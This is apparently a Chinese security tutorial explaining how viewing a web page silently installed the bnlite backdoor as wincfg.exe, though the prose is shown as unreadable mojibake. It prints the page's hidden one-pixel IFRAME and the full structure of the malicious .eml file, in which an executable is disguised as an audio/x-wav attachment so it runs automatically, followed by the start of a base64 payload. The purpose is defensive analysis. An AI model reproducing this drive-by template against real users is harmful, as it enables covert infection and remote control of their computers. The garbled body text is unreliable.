ÄúÕýÔÚ¿´µÄ×¢²á±í½Ì³ÌÊÇ:µ±ÐÄ£¡ä¯ÀÀÍøÒ³Ò²»áÖÐľÂí-×¢²á±íÈ«¹¥ÂÔ¡£ 49¡¢µ±ÐÄ£¡ä¯ÀÀÍøÒ³Ò²»áÖÐľÂí
Èç¹ûÎÒ¶ÔÄã˵ä¯ÀÀÍøÒ³Ò²»á¸ÐȾľÂí£¬ÄãÏàÐÅÂð£¿
¡¡¡¡Æäʵ£¬ÕâÒѾ²»ÊÇÏàÐŲ»ÏàÐŵÄÎÊÌâÁË£¬ÔÚ°ëÄêǰ¾ÍÓÐÈËʹÓÃÕâÖÖ¼¼ÊõÀ´Ê¹ÈËÖÐÕÐÁË£¡×î½üÌý˵ÓÐÈËÔÚä¯ÀÀij¸öÍøÕ¾Ê±ÖÐÕУ¬Òò´ËÈ¥ÄÇÀï¿´ÁË¿´£¬ÔÚÍøÒ³´ò¿ªµÄ¹ý³ÌÖУ¬Êó±êÆæ¹ÖµÄ±ä³Éɳ©ÐÎ×´£¬¿´À´µÄÈ·ÊÇÓгÌÐòÔÚÔËÐС£´ò¿ª¼ÆËã»úµÄÈÎÎñ¹ÜÀíÆ÷£¬¿ÉÒÔ¿´µ½¶àÁËÒ»¸öwincfg.exeµÄ½ø³Ì¡£½ø³Ì¶ÔÓ¦µÄÎļþÔÚwin2000ÏÂÊÇc:winntwincfg.exe£¬ÔÚwin98ÏÂΪc:windowswincfg.exe¡£ÔËÐÐ×¢²á±í±à¼Æ÷regedit£¬ÔÚHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun·¢ÏÖwincfg.exe£¬¹þ¹þ£¬ÔÀ´Ëü½«×Ô¼ºµÇ¼ÇÔÚ×¢²á±í¿ª»úÆô¶¯ÏîÖУ¬ÕâÑùÿ´Î¿ª»ú¶¼»á×Ô¶¯ÔËÐÐwincfg.exe£¡
¡¡¡¡×¢£º¸øÄãÏÂÌ×µÄÈË¿ÉÒÔ×Ô¼ºÉ趨Õâ¸öľÂíµÄÆô¶¯¼üÃûºÍ×¢²áÎļþÃû£¬×¢²áÎļþÃûÒ²¾ÍÊÇÔËÐÐʱ½ø³ÌÀïµÄÃû³Æ£¬Òò´Ë´ó¼Ò¿´µ½µÄ½á¹û¿ÉÄܲ»Ïàͬ¡£
¡¡¡¡ÔËÐнðɽ¶¾°Ô£¬±¨¸æ·¢ÏÖ¡°backdoor bnlite¡±£¬Å¶£¬ÔÀ´ÊÇľÂíbnlite·þÎñ¶Ë¸ÄÃûΪwincfg.exe¡£±ð¿´Õâ¸öľÂí·þÎñ¶Ë³ÌÐò²»´ó£¨Ö»ÓÐ6.5K£©£¬µ«ËüµÄ¹¦Äܿɲ»ÉÙ£º¾ßÓÐICQͨ±¨¹¦ÄÜ¡¢Ô¶³Ìɾ³ý·þÎñ¶Ë¹¦ÄÜ¡¢É趨¶Ë¿ÚºÍÔËÐÐÃû³Æ¡¢IP±¨ÐÅ£¨±¨¸æ·þÎñ¶ËËùÔÚµÄIPµØÖ·£©¡¢ÉÏ´«ÏÂÔØ¡¡Èç¹ûÄãÖÐÁ˸ÃľÂí£¬ÄÇôľÂí¿ØÖÆ¶ËËùÔÚÍêÈ«¿ÉÒÔͨ¹ýÕâ¸öľÂíÔÚÄãµÄµçÄÔÉϽ¨Á¢Ò»¸öÒþ²ØµÄftp·þÎñ£¬ÕâÑù±ðÈ˾ÍÓÐÈ«²¿È¨ÏÞ½øÈëÄãµÄµçÄÔÁË£¡¿ØÖÆÄãµÄµçÄÔ½«·Ç³£ÈÝÒ×£¡
¡¡¡¡ÈÃÎÒ¸ÐÐËȤµÄÊÇ£¬Ä¾ÂíÊÇÈçºÎÏÂÔØµ½ä¯ÀÀÁ˸ÃÖ÷Ò³µÄÓû§µÄ¼ÆËã»úÖС¢²¢ÔËÐÐÆðÀ´µÄ¡£ÔÚIEÖеã»÷¡°¹¤¾ß¡±¡ú¡°InternetÑ¡Ï¡ú¡°°²È«¡±¡ú¡°×Ô¶¨Ò尲ȫ¼¶±ð¡±£¬½«ActiveXÏà¹ØÑ¡ÏîÈ«²¿¶¼½ûÓã¬ÔÙä¯ÀÀ¸ÃÍøÒ³£¬wincfg.exe»¹ÊÇÏÂÔØ²¢ÔËÐÐÁË£¡¿´À´ºÍActiveXÎ޹ء£ÔÚ¡°×Ô¶¨Ò尲ȫ¼¶±ð¡±ÖÐÓйØÎļþÏÂÔØµÄÑ¡Ïî¶¼½ûÖ¹£¬ÔÙä¯ÀÀ¸ÃÍøÒ³£¬¹þ¹þ£¡Õâ»Øwincfg.exe²»ÔÙÏÂÔØÁË¡£
¡¡¡¡ÎÒÃÇÀ´¿´¿´wincfg.exeÊÇÈçºÎÏÂÔØµ½ä¯ÀÀÕß¼ÆËã»úÉϵģ¬ÔÚ¸ÃÍøÒ³Éϵã»÷Êó±êÓÒ¼ü£¬Ñ¡ÔñÆäÖеġ°²é¿´Ô´´úÂ롱£¬ÔÚÍøÒ³´úÂë×îºóÃæ·¢ÏÖÁË¿ÉÒɵÄÒ»¾ä£º
IFRAME src="wincfg.eml" width=1 height=1
¡¡¡¡×¢Òâµ½ÆäÖеġ°wincfg.eml¡±ÁËÂ𣿴ó¼Ò¶¼ÖªµÀemlΪÓʼþ¸ñʽ£¬ÍøÒ³ÖÐÒªemlÎļþ¸ÉÊ²Ã´ÄØ£¿·Ç³£¿ÉÒÉ£¡ÔÙ´Îä¯ÀÀ¸ÃÍøÒ³£¬ÔÙ¿´¿´ÈÎÎñ¹ÜÀíÆ÷£¬wincfg.exe½ø³ÌÓÖ»ØÀ´ÁË£¬ÔÀ´ÎÊÌâ¾ÍÔÚÕâ¸öÎļþÉÏ£¡¼ÈÈ»ÎÊÌâÔÚÕâÎļþÉÏ£¬µ±È»Ïë°ì·¨¸ãµ½Õâ¸öÎļþ¿´¿´ÁË¡£ÓÃÂìÒϰÑÎļþÏÂÔØÏÂÀ´£¬Êó±ê¸ÕµãÉÏÈ¥£¬wincfg.exeÓÖ±»Ö´ÐÐÁË£¬ÕæÊÇÒõ»ê²»É¢°¡£¡
´ò¿ªa.eml£¬·¢ÏÖÆäÄÚÈÝÈçÏ£º
From: "xxx" To: "xxx" Subject: xxxx
Date: Tue, 7 Apr 2001 15:16:57 +800
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--1
Content-Type: multipart/alternative;
boundary="2"
--2
Content-Type: text/html;
charset="gb2312"
Content-Transfer-Encoding: quoted-printable
HTML>
HEAD>
/HEAD>
BODY bgColor=3D#ffffff>
iframe src=3Dcid:THE-CID height=3D0 width=3D0>
/BODY>
--2--
--1
Content-Type: audio/x-wav;
name="wincfg.exe"
Content-Transfer-Encoding: base64
Content-ID:
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4
gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAIh3BDsAAAAAAAAAAOAADwELAQQUAC
AAAAAQAAAAkAAAIL0AAACgAAAAwAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAADQA
AAAEAAAAAA¡¡(ÒÔÏÂɾµôÒ»´ó½Ú)